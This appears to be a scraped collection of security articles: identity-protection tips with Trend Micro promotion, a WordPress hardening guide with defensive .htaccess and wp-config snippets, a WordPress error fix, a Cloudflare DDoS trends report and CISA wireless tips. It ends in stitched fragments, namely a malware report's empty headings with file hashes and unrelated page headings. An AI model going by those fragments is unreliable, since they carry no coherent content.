Using strong, long and unique passwords for all accounts, managed with a password manager.Enable two-factor authentication (2FA) if possible on all accounts.Don’t overshare on social media.Freeze credit immediately if you suspect data has been misused.Remember that if something looks too good to be true online it usually is.Don’t use public Wi-Fi when out-and-about, especially not for sensitive log-ins, without a VPN.Change your password immediately if a provider tells you your data may have been breached.Only visit/enter payment details into HTTPS sites.Don’t click on links or open attachments in unsolicited emails.Only download apps from official app stores.Invest in AV from a reputable vendor for all your desktop and mobile devices.Ensure all operating systems and applications are on the latest version (i.e., patch frequently).Keep an eye on your bank account/credit card for any unusual spending activity.Consider investing in a service to monitor the dark web for your personal data.

How Trend Micro can help

Trend Micro offers solutions that can help to protect your digital identity.

Trend Micro ID Security is the best way to get proactive about data protection. It works 24/7 to monitor dark web sites for your PII and will sound the alarm immediately if it finds any sign your accounts or personal data have been stolen. It features

Dark Web Personal Data Manager to scour underground sites and alert if it finds personal info like bank account numbers, driver’s license numbers, SSNs and passport information.Credit Card Checker will do the same as the above but for your credit card information.Email Checker will alert you if any email accounts have been compromised and end up for sale on the dark web, allowing you to immediately change the password.Password Checker will tell you if any passwords you’re using have appeared for sale on the dark web, enabling you to improve password security.

Trend Micro Password Manager enables you to manage all your website and app log-ins from one secure location. Because Password Manager remembers and recalls your credentials on-demand, you can create long, strong and unique passwords for each account. As you’re not sharing easy-to-remember passwords across multiple accounts, you’ll be protected from popular credential stuffing and similar attacks.

Finally, Trend Micro WiFi Protection will protect you if you’re out and about connecting to WiFi hotspots. It automatically detects when a WiFi connection isn’t secure and enables a VPN—making your connection safer and helping keep your identity data private.

In short, it’s time to take an active part in protecting your personal identity data—as if your digital life depended on it. In large part, it does.

Source :
https://blog.trendmicro.com/identity-fraud-how-to-protect-your-identity-data-accounts-and-money-during-the-coronavirus-crisis/

WordPress Security Guide: 14 Actionable Tips to Harden WordPress

If you have a website running on WordPress then ensuring its security should be your foremost concern. But before you even begin to harden WordPress, you should first know…

Why WordPress Security is Important?

WordPress accounted for 90% of all hacked sites that were fixed by Sucuri in 2018 as per this report.
WordPress sets the default username to Admin which is child’s play to guess for anyone.
WordPress reveals the username in the author slug by default.
An intruder can access your site’s database tables which are, by default, set to wp_prefix and can be guessed easily, unless modified.
Your site is vulnerable to DoS (denial of service) attacks which can result in prolonged downtime.
A hacker can inject malicious code in your website’s database without your knowledge.
And many more reasons as revealed by this WordPress security infographic.

This WordPress Security guide provides only the most useful tips for securing and hardening your WordPress site that you can implement right away, leaving you with ample time to focus on other important aspects of your website.

So let’s start.WordPress Security Checklist

1. Keep a Strong Password that is Hard to Crack

When you install WordPress on your site for the first time, you have to fill in the password among other details. An easy to crack password is the simplest way a hacker can gain access to your website. So what’s the solution?

Make sure you set a strong password containing a combination of uppercase and lowercase alphabets, characters and numbers that cannot be guessed. Please don’t keep a hacker-friendly password like “your name” or “password”.

The second tip is that you should never disclose your site password to anyone. If you have to provide your login details for support purposes to some 3rd party, make sure to change your password once the support issue is resolved.

2. Keep a Username that Cannot be Guessed

By default, WordPress sets the username to ‘admin’ at the time of installation. Nothing could be easier to guess than this. So please make sure to set a hard-to-guess username when you install WordPress.

But this is just the first step.

The second step is to hide your username from the site visitors since WordPress reveals your username in the author profile.

So head over to Admin menu>Users>Your Profile and change your Nickname from your admin username to something different, most probably your real name, and then select your newly created Nickname from the ‘Display name publicly as‘ dropdown.

3. Change the Author Slug to Hide Your Username

But even after you change the author nickname, WordPress reveals your real username in the author ‘slug’ or URL whenever anyone hovers over the author name. So, you should hide your real username in the author ‘slug’.

But how do you hide your username in the author slug or URL? There are two easy ways to do this.

The first method is by using a free plugin like Edit Author Slug.

Or if you’re like me and would rather do it manually rather than installing a plugin, then the second method is the best solution and hardly takes 5 minutes to implement.

Head over to phpMyadmin in your cPanel (hopefully your web host allows access to the php database). Once inside phpMyAdmin panel, from the left menu of scroll to the wp_users table (replace ‘wp’ with your database tables prefix).

You will see your login details here. You should change the user_nicename from your actual username to something different and then save the changes. That’s it; your real username will no longer be displayed on your author slug.

Want to ensure fool-proof login security? Then consider setting up 2-factor authentication (2FA) for your login page. This way no intruder can gain access to your site even he manages to crack your password.

Now, you should know that different types of 2FA are available like SMS based or app-based. For the purpose of this step, we will use an app-based 2FA for securing the WordPress login page.

First, install the Google Authenticator plugin on your site. Of course, you must have the Google Authenticator app installed on your phone. If you have not already installed it, do it before proceeding to the next step.

Now in the settings page of the plugin, click on the Configure button under the Google Authenticator tab. It will ask you to first create a mini orange account (the plugin creator) which will take about 10 seconds. Now onto the next step.

Then scan the bar code using the Google Authenticator app on your mobile. Notice that you can also use the LastPass authenticator here if you prefer this app.

Finally, just enter the one time code and you are all set. But don’t forget to tick the “Enable 2FA prompt on the WP Login Page” checkbox.

Now when you log in to your site the next time, you will see an additional 2FA prompt below the email and password boxes like this.

5. Secure your .htaccess File for First Line of Defence

The .htaccess file is an Apache Web Server file that enables basic redirects and is also useful for enhancing your website security.

It is a good first line of defence for securing your website.

Your .htaccess file can secure your website in the following ways by:

Restricting access to important files and folders
Disabling directory browsing
Allowing only specific IPs to access the Admin area
Disabling access to XML-RPC File
Blocking author scans

Now let’s start adding the code snippets for each of the above steps. Remember, you need to add the snippets listed in the following steps in your .htaccess file outside the #Begin WordPress and #End WordPress tags.

1. Restrict access to important files and folders

You should restrict access to important files such as wp-config.php, php.ini and .htaccess itself since no one but yourself should have a concern with these files. Just add the following snippet to restrict access.

# Block wp-config, php.ini and .htaccess
<FilesMatch "^.*(error_log|wp-config\.php|php.ini|\.[hH][tT][aApP].*)$">
Order deny,allow
Deny from all
</FilesMatch>

Next, you should disable access to the wp-includes folder since this folder contains files that are required to run the WordPress core minus the plugins and themes. So why should anyone snoop around in this folder?

# Block wp-includes folder and files
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]
</IfModule>

2. Disable directory browsing

What’s easier to break into for a thief, a home whose plan details are known or one whose are unknown? Similarly, if your site’s file and directory structure is visible, it will be easier for hackers to break into your site.

To prevent this, you should disable directory browsing by adding the following code.

Options -Indexes

3. Allow only specific IPs to access the Admin area

If you’re running a single author blog and access your site from known IPs, then you can only allow these known IPs to access the WordPress admin area by inserting the following snippet.

AuthUserFile /dev/null
AuthGroupFile /dev/null
AuthName "WordPress Admin Access Control"
AuthType Basic
<LIMIT GET>
order deny,allow
deny from all
# whitelist Syed's IP address
allow from xx.xx.xx.xxx
# whitelist David's IP address
allow from xx.xx.xx.xxx
</LIMIT>

Remember to replace the xx in the snippet above with your IP. If you access your site from multiple IPs, then insert all the IPs in the ‘all from’ line.

4. Disable access to XML-RPC File

The XML-RPC file enables 3rd party application access to your website. If you’re not giving access to any 3rd party app, it’s advisable to disable access to the XML-RPC file since it could be used by hackers gain backdoor entry to your site.

Just add the following code in the .htaccess file to do this.

# Block WordPress xmlrpc.php requests
<Files xmlrpc.php>
order deny,allow
deny from all
</Files>

5. Block author scans

Another way hackers can gain entry to your WordPress site is by scanning all the usernames used on your site and then trying to crack your admin password with those usernames. This is typical of a brute force attack.

To prevent anyone from fishing for usernames, you should block author scans by adding the following snippet in the .htaccess file.

# BEGIN block author scans
RewriteEngine On
RewriteBase /
RewriteCond %{QUERY_STRING} (author=\d+) [NC]
RewriteRule .* - [F]
# END block author scans

6. Use a Security Plugin for All-round Protection

A good security plugin is essential to enhance your WordPress site’s security. There are many plugins available to boost your site’s security but some of the better ones include All-In-One WP Security & Firewall (which I use and recommend), BulletProof Security and iThemes Security.

The free All-In-One WP Security & Firewall plugin has very useful features, including:

It checks whether you have changed the default ‘admin’ username or not. It also checks your password strength using a Password Strength Tool.
It has many user login options, including, options for preventing rogue sign-ins and site lockout features.
If you allow user registration, you can implement captcha on the registration and login pages.
Checks whether you still use the default wp_ prefix for your database tables and provides the option to change the database prefix.
Enables automated backups of your database.
Has multiple file security options, including, setting the default file permissions, disabling PHP file editing within the dashboard etc.
You can ban multiple users by IPs or user agents.
Has advanced firewall rules to completely secure your WordPress site.
Prevents brute force attacks by using advanced options.
Prevents comment spam by deploying captcha on the comment form and blocking comment spambots.
WordPress scanner to detect changes in files
And many more features.

7. Protect Your Site from DDoS Attacks

If you’re running a popular WordPress website with high traffic, your site could be vulnerable to DDoS (Distributed Denial of Service) attacks that can result in unscheduled downtime and loss of revenue.

There are multiple ways to prevent such an attack from occurring. The first is at the server or hosting level. Your hosting company could offer a DoS attack protection. If you haven’t decided on your web host yet, you can consider WPX Hosting that offers comprehensive website security for free.

The second method is to use a free CDN like Cloudflare that offers free DoS mitigation plans at the entry-level which are good enough for sites with moderate traffic.

8. Make Regular Backups for Unforeseen Situations

In the event of any disruption on your site, you could lose all your hard work, including, your posts. To prevent such an extreme event from occurring it is always advisable to maintain regular backups of your WordPress site.

Again, there are two ways to do this.

The first method is to find a web host that offers free daily backups. If you’re using managed WordPress hosting, chances are your web host already offers free daily backups. Even if not, you can check out with your host regarding this must-have feature.

The second method is to use a free plugin like UpdraftPlus that allows you to schedule daily automatic backups directly to Dropbox, Google Drive, Amazon S3 etc.

9. Use SSL to Encrypt the Connection between Your Site and Users

Secure Socket Layer (SSL) encrypts the information between your web host server and the visitors’ browser preventing leaking of sensitive information like their payment credentials to curious eavesdroppers.

Apart from the security aspect, SSL is also a ranking factor in Google’s search results and you would do well to implement it on your site. That’s why I recommend implementing SSL on your website. You can also get free SSL from some web hosts. Read on to know more.

10. Use Secure Hosting to Fortify Your Site

You may have taken the utmost care to secure your WordPress site, but what if your web server is prone to malicious attacks? There isn’t much you can do in this case.

But what you can and should do is to choose a web host that provides the maximum security to your websites. What kind of security am I talking about?

Well, the most important security feature your web host can provide is free malware scanning. After all, malware removal can cost an arm and length once your site is hit by a malware.

Fortunately, help is at hand.

We use WPX hosting for hosting all our websites since they provide the following three crucial features for securing my website, absolutely free of cost:

Free malware scanning and removal
Free SSL certificate for all my sites
Free daily backups

I also have to add that WPX Hosting provides free cloud-based CDN (content delivery network) and a managed WordPress hosting support experience that I absolutely love.

11. Change the Database Table Prefix to Deter Hackers

Your WordPress database is vulnerable to MySQL injection if a hacker can get his hands on it. You cannot completely secure your WordPress database but you sure can make it difficult for hackers to find your database tables by changing their default prefix from “wp_” to something difficult to guess.

The easiest way to change your database table prefix is by using the terrific (and free) security plugin All-in-One WP Security and Firewall.

12. Update Your Plugins and Themes to Prevent Backdoor Access

Plugins are arguably the primary reason to use WordPress over any other CMS. They extend WordPress capabilities in a limitless manner. But they are also a source of malicious code which could play havoc with your website.

To avoid this possibility, make sure you install only legitimate plugins on your site and avoid any hacked or nulled plugin like the plague since the person who nulled the plugin could also embed some unsuspecting malware into the plugin.

Also, make sure to install the latest version of the plugin since these usually contain many bug fixes. If the plugin hasn’t been updated in a long time, it may be wiser to switch to an alternative.

Speaking of the latest version, make sure to…

13. Enable Auto Updates for Plugins and Themes

If you use many plugins, there may be frequent updates and updating these plugins will in itself become a chore for you. One easy fix for this is to use the JetPack plugin by Automattic (the creators of WordPress).

Jetpack has this wonderful option to enable auto-updates for all plugins that you install from WordPress.org repository. Remember, you will still need to update any 3rd party plugin manually.

But I am assuming that the bulk of your plugins will be free plugins installed from WordPress.org and you can enable auto-updates for all of these.

The second method is even better since you can auto-update not just your plugins but also themes and even the major versions of WordPress. However, you should not use this if there is a possibility of the updates breaking your site.

Just insert the following code in the wp-config.php file, which is located in the public_html directory.

define('WP_AUTO_UPDATE_CORE', true);
 add_filter( 'auto_update_plugin', '__return_true' );
 add_filter( 'auto_update_theme', '__return_true' );

14. Disable the Theme and Plugin Editor

You should also consider disabling access to the theme and plugin editor within your WordPress admin dashboard as an added security measure to prevent users with admin access to tinker with your database.

Just add the following single line of code in the wp-config.php file.

define('DISALLOW_FILE_EDIT', true);

And there we have it. 14 in-depth tips to take your WordPress security to the next level and protect your site from most of the attacks that could be directed its way.

What do you feel about these tips to harden WordPress security and how many have you implemented on tour site? Let me know in the comments.

Please Note: This page contains affiliate links to products or services that are tried and tested by us. If you buy the product or service using our affiliate links, at no additional cost to you, it will help us to maintain this site and publish useful content regularly. Thank you.

Source :
https://wpbizblog.com/wordpress-security-guide/

How to Fix “the response is not a valid JSON response” Error in WordPress

You are creating content in the WordPress editor but the document fails to update. In fact, you see an error message that says “Updating failed. Error message: The response is not a valid JSON response.” Before you panic, let me assure you that this error can be resolved easily so you don’t lose your hard work.

Why does “the response is not a valid JSON response” error occur?

There could be multiple reasons why this error occurs. This post delves into each reason and offers multiple solutions to solve the problem.

Disable the Block editor and switch back to Classic editor

WordPress classic editor — Old is still Gold in WordPress

The error “Updating failed. Error message: The response is not a valid JSON response.” is overwhelmingly seen in the new Block editor called Gutenberg.

The easiest way to resolve the updating error is by disabling Gutenberg and switching back to the Classic editor. As they say, old is Gold.

You can install the Classic Editor plugin for this. Once you have activated the plugin, try to save your posts. You should not see any error message now.

But what if you still want to use the block editor?

Nice question. It could be that reverting to the classic editor is not an option for you. In that case, you should follow what we are doing on PassionWP. With the classic editor plugin installed and activated, navigate to Settings>Writing.

Now select the Classic Editor as the “default editor for all users” option, save your changes, and clear your website cache. Right after this, select the Block Editor as the default editor and again save the changes.

Classic Editor plugin settings for WordPress — Classic Editor plugin settings

Now try editing an existing post or create a new post with the block editor. You should not encounter the JSON response error. However, it could be that the editor fails to automatically save your changes.

In this event, press Ctrl + S (Cmd + S for Mac) to manually save your changes. This solution works for us and we are using the block editor without encountering the JSON response error.

Mixed content error due to the use of SSL certificate

Another common reason for this error is the use of a secure socket layer (SSL) certificate (Https) on your WordPress site. Using an SSL certificate can result in some content being delivered non-securely on Http protocol even while the rest of the content is delivered in a secure manner over Https protocol.

This results in a mixed content error in which both https and https content is transmitted at the same time to the web browser, usually Google Chrome.

How to solve the Mixed Content Error in WordPress?

We investigated the mixed content error and noticed that it is linked to the use of the Really Simple SSL plugin that is used by over 3 million WordPress users to configure https on their websites.

To resolve the “the response is not a valid JSON response” or mixed content error, navigate to Settings > SSL. This will open the plugin’s settings. Now click on the Settings tab.

You should do the following two things here:

Ensure that the “Mixed content fixer” option is turned on. This prevents mixed content problems on your website that we discussed above.
Next, you should turn on the “Use an alternative method to fix the mixed content” option. This will ensure that “the response is not a valid JSON response” error does not erupt abruptly while editing.

How to fix the response is not a valid JSON response error in WordPress — Really Simple SSL settings

After saving the changes, go back to the post you were working on and try saving your post or page. You should no longer experience the response is not a valid JSON response error.

Alternative solutions to the response is not a valid JSON response error

Deactivate all the plugins on your site and edit the content normally. If you’re using the Really Simple SSL plugin then deactivate this plugin first. Subsequently, try saving the document. If you are able to save it without facing any errors, re-activate the plugins one by one to check which plugin was causing the error.

There is another solution you can try to fix the response is not a valid JSON response error in WordPress.

Navigate to Settings > Permalinks. Change the permalink structure from post-name or the current structure to Plain i.e. https://yoursite.com/?p=123. Now try saving your post/page. The problem should have been resolved.

Fix the response is not a valid json response error by changing the permalink — WordPress permalinks settings

But try this solution if all other methods fail as changing the permalinks will result in huge SEO issues on a live website and you will also need to add multiple redirects.

We discussed 4 possible solutions to the response is not a valid JSON response error in WordPress. I hope one of these methods worked for you. If it did, let me know in the comments below. If it didn’t, post your specific problem so others can suggest different solutions.

Source :
https://wpbizblog.com/response-is-not-a-valid-json-response-error/

Network-layer DDoS attack trends for Q2 2020

In the first quarter of 2020, within a matter of weeks, our way of life shifted. We’ve become reliant on online services more than ever. Employees that can are working from home, students of all ages and grades are taking classes online, and we’ve redefined what it means to stay connected. The more the public is dependent on staying connected, the larger the potential reward for attackers to cause chaos and disrupt our way of life. It is therefore no surprise that in Q1 2020 (January 1, 2020 to March 31, 2020) we reported an increase in the number of attacks—especially after various government authority mandates to stay indoors—shelter-in-place went into effect in the second half of March.

In Q2 2020 (April 1, 2020 to June 30, 2020), this trend of increasing DDoS attacks continued and even accelerated:

The number of L3/4 DDoS attacks observed over our network doubled compared to that in the first three months of the year.
The scale of the largest L3/4 DDoS attacks increased significantly. In fact, we observed some of the largest attacks ever recorded over our network.
We observed more attack vectors being deployed and attacks were more geographically distributed.

The number of global L3/4 DDoS attacks in Q2 doubled

Gatebot is Cloudflare’s primary DDoS protection system. It automatically detects and mitigates globally distributed DDoS attacks. A global DDoS attack is an attack that we observe in more than one of our edge data centers. These attacks are usually generated by sophisticated attackers employing botnets in the range of tens of thousand to millions of bots.

Sophisticated attackers kept Gatebot busy in Q2. The total number of global L3/4 DDoS attacks that Gatebot detected and mitigated in Q2 doubled quarter over quarter. In our Q1 DDoS report, we reported a spike in the number and size of attacks. We continue to see this trend accelerate through Q2; over 66% of all global DDoS attacks in 2020 occurred in the second quarter (nearly 100% increase). May was the busiest month in the first half of 2020, followed by June and April. Almost a third of all L3/4 DDoS attacks occurred in May.

In fact, 63% of all L3/4 DDoS attacks that peaked over 100 Gbps occurred in May. As the global pandemic continued to heighten around the world in May, attackers were especially eager to take down websites and other Internet properties.

Small attacks continue to dominate in numbers as big attacks get bigger in size

A DDoS attack’s strength is equivalent to its size—the actual number of packets or bits flooding the link to overwhelm the target. A ‘large’ DDoS attack refers to an attack that peaks at a high rate of Internet traffic. The rate can be measured in terms of packets or bits. Attacks with high bit rates attempt to saturate the Internet link, and attacks with high packet rates attempt to overwhelm the routers or other in-line hardware devices.

Similar to Q1, the majority of L3/4 DDoS attacks that we observed in Q2 were also relatively ‘small’ with regards to the scale of Cloudflare’s network. In Q2, nearly 90% of all L3/4 DDoS attacks that we saw peaked below 10 Gbps. Small attacks that peak below 10 Gbps can still easily cause an outage to most of the websites and Internet properties around the world if they are not protected by a cloud-based DDoS mitigation service.

Similarly, from a packet rate perspective, 76% of all L3/4 DDoS attacks in Q2 peaked up to 1 million packets per second (pps). Typically, a 1 Gbps Ethernet interface can deliver anywhere between 80k to 1.5M pps. Assuming the interface also serves legitimate traffic, and that most organizations have much less than a 1 Gbps interface, you can see how even these ‘small’ packet rate DDoS attacks can easily take down Internet properties.

In terms of duration, 83% of all attacks lasted between 30 to 60 minutes. We saw a similar trend in Q1 with 79% of attacks falling in the same duration range. This may seem like a short duration, but imagine this as a 30 to 60 minute cyber battle between your security team and the attackers. Now it doesn’t seem so short. Additionally, if a DDoS attack creates an outage or service degradation, the recovery time to reboot your appliances and relaunch your services can be much longer; costing you lost revenue and reputation for every minute.

In Q2, we saw the largest DDoS attacks on our network, ever

This quarter, we saw an increasing number of large scale attacks; both in terms of packet rate and bit rate. In fact, 88% of all DDoS attacks in 2020 that peaked above 100 Gbps were launched after shelter-in-place went into effect in March. Once again, May was not just the busiest month with the most number of attacks, but also the greatest number of large attacks above 100 Gbps.

From the packet perspective, June took the lead with a whopping 754 million pps attack. Besides that attack, the maximum packet rates stayed mostly consistent throughout the quarter with around 200 million pps.

The 754 million pps attack was automatically detected and mitigated by Cloudflare. The attack was part of an organized four-day campaign that lasted from June 18 to the 21. As part of the campaign, attack traffic from over 316,000 IP addresses targeted a single Cloudflare IP address.

Cloudflare’s DDoS protection systems automatically detected and mitigated the attack, and due to the size and global coverage of our network, there was no impact to performance. A global interconnected network is crucial when mitigating large attacks in order to be able to absorb the attack traffic and mitigate it close to the source, whilst also continuing serving legitimate customer traffic without inducing latency or service interruptions.

The United States is targeted with the most attacks

When we look at the L3/4 DDoS attack distribution by country, our data centers in the United States received the most number of attacks (22.6%), followed by Germany (4.4%), Canada (2.7%) and Great Britain (2.6%).

However when we look at the total attack bytes mitigated by each Cloudflare data center, the United States still leads (34.9%), but followed by Hong Kong (6.6%), Russia (6.5%), Germany (4.5%) and Colombia (3.7%). The reason for this change is due to the total amount of bandwidth that was generated in each attack. For instance, while Hong Kong did not make it to the top 10 list due to the relatively small number of attacks that was observed in Hong Kong (1.8%), the attacks were highly volumetric and generated so much attack traffic that pushed Hong Kong to the 2nd place.

When analyzing L3/4 DDoS attacks, we bucket the traffic by the Cloudflare edge data center locations and not by the location of the source IP. The reason is when attackers launch L3/4 attacks they can ‘spoof’ (alter) the source IP address in order to obfuscate the attack source. If we were to derive the country based on a spoofed source IP, we would get a spoofed country. Cloudflare is able to overcome the challenges of spoofed IPs by displaying the attack data by the location of Cloudflare’s data center in which the attack was observed. We’re able to achieve geographical accuracy in our report because we have data centers in over 200 cities around the world.

57% of all L3/4 DDoS attacks in Q2 were SYN floods

An attack vector is a term used to describe the attack method. In Q2, we observed an increase in the number of vectors used by attackers in L3/4 DDoS attacks. A total of 39 different types of attack vectors were used in Q2, compared to 34 in Q1. SYN floods formed the majority with over 57% in share, followed by RST (13%), UDP (7%), CLDAP (6%) and SSDP (3%) attacks.

SYN flood attacks aim to exploit the handshake process of a TCP connection. By repeatedly sending initial connection request packets with a synchronize flag (SYN), the attacker attempts to overwhelm the router’s connection table that tracks the state of TCP connections. The router replies with a packet that contains a synchronized acknowledgment flag (SYN-ACK), allocates a certain amount of memory for each given connection and falsely waits for the client to respond with a final acknowledgment (ACK). Given a sufficient number of SYNs that occupy the router’s memory, the router is unable to allocate further memory for legitimate clients causing a denial of service.

No matter the attack vector, Cloudflare automatically detects and mitigates stateful or stateless DDoS attacks using our 3 pronged protection approach comprising of our home-built DDoS protection systems:

Gatebot – Cloudflare’s centralized DDoS protection systems for detecting and mitigating globally distributed volumetric DDoS attacks. Gatebot runs in our network’s core data center. It receives samples from every one of our edge data centers, analyzes them and automatically sends mitigation instructions when attacks are detected. Gatebot is also synchronized to each of our customers’ web servers to identify its health and triggers accordingly, tailored protection.
dosd (denial of service daemon) – Cloudflare’s decentralized DDoS protection systems. dosd runs autonomously in each server in every Cloudflare data center around the world, analyzes traffic, and applies local mitigation rules when needed. Besides being able to detect and mitigate attacks at super fast speeds, dosd significantly improves our network resilience by delegating the detection and mitigation capabilities to the edge.
flowtrackd (flow tracking daemon) – Cloudflare’s TCP state tracking machine for detecting and mitigating the most randomized and sophisticated TCP-based DDoS attacks in unidirectional routing topologies. flowtrackd is able to identify the state of a TCP connection and then drops, challenges or rate-limits packets that don’t belong to a legitimate connection.

In addition to our automated DDoS protection systems, Cloudflare also generates real-time threat intelligence that automatically mitigates attacks. Furthermore, Cloudflare provides its customers firewall, rate-limiting and additional tools to further customize and optimize their protection.

Cloudflare DDoS mitigation

As Internet usage continues to evolve for businesses and individuals, expect DDoS tactics to adapt as well. Cloudflare protects websites, applications, and entire networks from DDoS attacks of any size, kind, or level of sophistication.

Our customers and industry analysts recommend our comprehensive solution for three main reasons:

Network scale: Cloudflare’s 37 Tbps network can easily block attacks of any size, type, or level of sophistication. The Cloudflare network has a DDoS mitigation capacity that is higher than the next four competitors—combined.
Time-to-mitigation: Cloudflare mitigates most network layer attacks in under 10 seconds globally, and immediate mitigation (0 seconds) when static rules are preconfigured. With our global presence, Cloudflare mitigates attacks close to the source with minimal latency. In some cases, traffic is even faster than over the public Internet.
Threat intelligence: Cloudflare’s DDoS mitigation is powered by threat intelligence harnessed from over 27 million Internet properties on it. Additionally, the threat intelligence is incorporated into customer facing firewalls and tools in order to empower our customers.

Cloudflare is uniquely positioned to deliver DDoS mitigation with unparalleled scale, speed, and smarts because of the architecture of our network. Cloudflare’s network is like a fractal—every service runs on every server in every Cloudflare data center that spans over 200 cities globally. This enables Cloudflare to detect and mitigate attacks close to the source of origin, no matter the size, source, or type of attack.

To learn more about Cloudflare’s DDoS solution contact us or get started.

You can also join an upcoming live webinar where we will be discussing these trends, and strategies enterprises can implement to combat DDoS attacks and keep their networks online and fast.

Source :
https://blog.cloudflare.com/network-layer-ddos-attack-trends-for-q2-2020/

Securing Wireless Networks

In today’s connected world, almost everyone has at least one internet-connected device. With the number of these devices on the rise, it is important to implement a security strategy to minimize their potential for exploitation (see Securing the Internet of Things). Internet-connected devices may be used by nefarious entities to collect personal information, steal identities, compromise financial data, and silently listen to—or watch—users. Taking a few precautions in the configuration and use of your devices can help prevent this type of activity.

What are the risks to your wireless network?

Whether it’s a home or business network, the risks to an unsecured wireless network are the same. Some of the risks include:

Piggybacking

If you fail to secure your wireless network, anyone with a wireless-enabled computer in range of your access point can use your connection. The typical indoor broadcast range of an access point is 150–300 feet. Outdoors, this range may extend as far as 1,000 feet. So, if your neighborhood is closely settled, or if you live in an apartment or condominium, failure to secure your wireless network could open your internet connection to many unintended users. These users may be able to conduct illegal activity, monitor and capture your web traffic, or steal personal files.

Wardriving

Wardriving is a specific kind of piggybacking. The broadcast range of a wireless access point can make internet connections available outside your home, even as far away as your street. Savvy computer users know this, and some have made a hobby out of driving through cities and neighborhoods with a wireless-equipped computer—sometimes with a powerful antenna—searching for unsecured wireless networks. This practice is known as “wardriving.”

Evil Twin Attacks

In an evil twin attack, an adversary gathers information about a public network access point, then sets up their system to impersonate it. The adversary uses a broadcast signal stronger than the one generated by the legitimate access point; then, unsuspecting users connect using the stronger signal. Because the victim is connecting to the internet through the attacker’s system, it’s easy for the attacker to use specialized tools to read any data the victim sends over the internet. This data may include credit card numbers, username and password combinations, and other personal information. Always confirm the name and password of a public Wi-Fi hotspot prior to use. This will ensure you are connecting to a trusted access point.

Wireless Sniffing

Many public access points are not secured and the traffic they carry is not encrypted. This can put your sensitive communications or transactions at risk. Because your connection is being transmitted “in the clear,” malicious actors could use sniffing tools to obtain sensitive information such as passwords or credit card numbers. Ensure that all the access points you connect to use at least WPA2 encryption.

Unauthorized Computer Access

An unsecured public wireless network combined with unsecured file sharing could allow a malicious user to access any directories and files you have unintentionally made available for sharing. Ensure that when you connect your devices to public networks, you deny sharing files and folders. Only allow sharing on recognized home networks and only while it is necessary to share items. When not needed, ensure that file sharing is disabled. This will help prevent an unknown attacker from accessing your device’s files.

Shoulder Surfing

In public areas malicious actors can simply glance over your shoulder as you type. By simply watching you, they can steal sensitive or personal information. Screen protectors that prevent shoulder-surfers from seeing your device screen can be purchased for little money. For smaller devices, such as phones, be cognizant of your surroundings while viewing sensitive information or entering passwords.

Theft of Mobile Devices

Not all attackers rely on gaining access to your data via wireless means. By physically stealing your device, attackers could have unrestricted access to all of its data, as well as any connected cloud accounts. Taking measures to protect your devices from loss or theft is important, but should the worst happen, a little preparation may protect the data inside. Most mobile devices, including laptop computers, now have the ability to fully encrypt their stored data—making devices useless to attackers who cannot provide the proper password or personal identification number (PIN). In addition to encrypting device content, it is also advisable to configure your device’s applications to request login information before allowing access to any cloud-based information. Last, individually encrypt or password-protect files that contain personal or sensitive information. This will afford yet another layer of protection in the event an attacker is able to gain access to your device.

What can you do to minimize the risks to your wireless network?

Change default passwords. Most network devices, including wireless access points, are pre-configured with default administrator passwords to simplify setup. These default passwords are easily available to obtain online, and so provide only marginal protection. Changing default passwords makes it harder for attackers to access a device. Use and periodic changing of complex passwords is your first line of defense in protecting your device. (See Choosing and Protecting Passwords.)
Restrict access. Only allow authorized users to access your network. Each piece of hardware connected to a network has a media access control (MAC) address. You can restrict access to your network by filtering these MAC addresses. Consult your user documentation for specific information about enabling these features. You can also utilize the “guest” account, which is a widely used feature on many wireless routers. This feature allows you to grant wireless access to guests on a separate wireless channel with a separate password, while maintaining the privacy of your primary credentials.
Encrypt the data on your network. Encrypting your wireless data prevents anyone who might be able to access your network from viewing it. There are several encryption protocols available to provide this protection. Wi-Fi Protected Access (WPA), WPA2, and WPA3 encrypt information being transmitted between wireless routers and wireless devices. WPA3 is currently the strongest encryption. WPA and WPA2 are still available; however, it is advisable to use equipment that specifically supports WPA3, as using the other protocols could leave your network open to exploitation.
Protect your Service Set Identifier (SSID). To prevent outsiders from easily accessing your network, avoid publicizing your SSID. All Wi-Fi routers allow users to protect their device’s SSID, which makes it more difficult for attackers to find a network. At the very least, change your SSID to something unique. Leaving it as the manufacturer’s default could allow a potential attacker to identify the type of router and possibly exploit any known vulnerabilities.
Install a firewall. Consider installing a firewall directly on your wireless devices (a host-based firewall), as well as on your home network (a router- or modem-based firewall). Attackers who can directly tap into your wireless network may be able to circumvent your network firewall—a host-based firewall will add a layer of protection to the data on your computer (see Understanding Firewalls for Home and Small Office Use).
Maintain antivirus software. Install antivirus software and keep your virus definitions up to date. Many antivirus programs also have additional features that detect or protect against spyware and adware (see Protecting Against Malicious Code and What is Cybersecurity?).
Use file sharing with caution. File sharing between devices should be disabled when not needed. You should always choose to only allow file sharing over home or work networks, never on public networks. You may want to consider creating a dedicated directory for file sharing and restrict access to all other directories. In addition, you should password protect anything you share. Never open an entire hard drive for file sharing (see Choosing and Protecting Passwords).
Keep your access point software patched and up to date. The manufacturer of your wireless access point will periodically release updates to and patches for a device’s software and firmware. Be sure to check the manufacturer’s website regularly for any updates or patches for your device.
Check your internet provider’s or router manufacturer’s wireless security options. Your internet service provider and router manufacturer may provide information or resources to assist in securing your wireless network. Check the customer support area of their websites for specific suggestions or instructions.
Connect using a Virtual Private Network (VPN). Many companies and organizations have a VPN. VPNs allow employees to connect securely to their network when away from the office. VPNs encrypt connections at the sending and receiving ends and keep out traffic that is not properly encrypted. If a VPN is available to you, make sure you log onto it any time you need to use a public wireless access point.

Authors

CISA

Source :
https://us-cert.cisa.gov/ncas/tips/ST05-003

Notification

Summary

Description

Submitted Files (2)

Findings

0be114fe30ef5042890c17033b63d7c9e0363972fcc15a61433c598dd33f49d1

Tags

Details

Antivirus

YARA Rules

ssdeep Matches

PE Metadata

PE Sections

Description

2631f95e9a46c821a701269a76b15bb065764cc15a0b268a4d1eac045975c9b8

Details

Antivirus

YARA Rules

ssdeep Matches

PE Metadata

PE Sections

Description

Recommendations

Contact Information

Document FAQ

Protection against MITM and downgrade attacks

DNSSEC and DANE for SMTP also coming

Shodan lists over 800,000 devices

Impacted versions and remediation guidance

New user experience

New brand identity

New ways to get started

Empowering our customers and partners

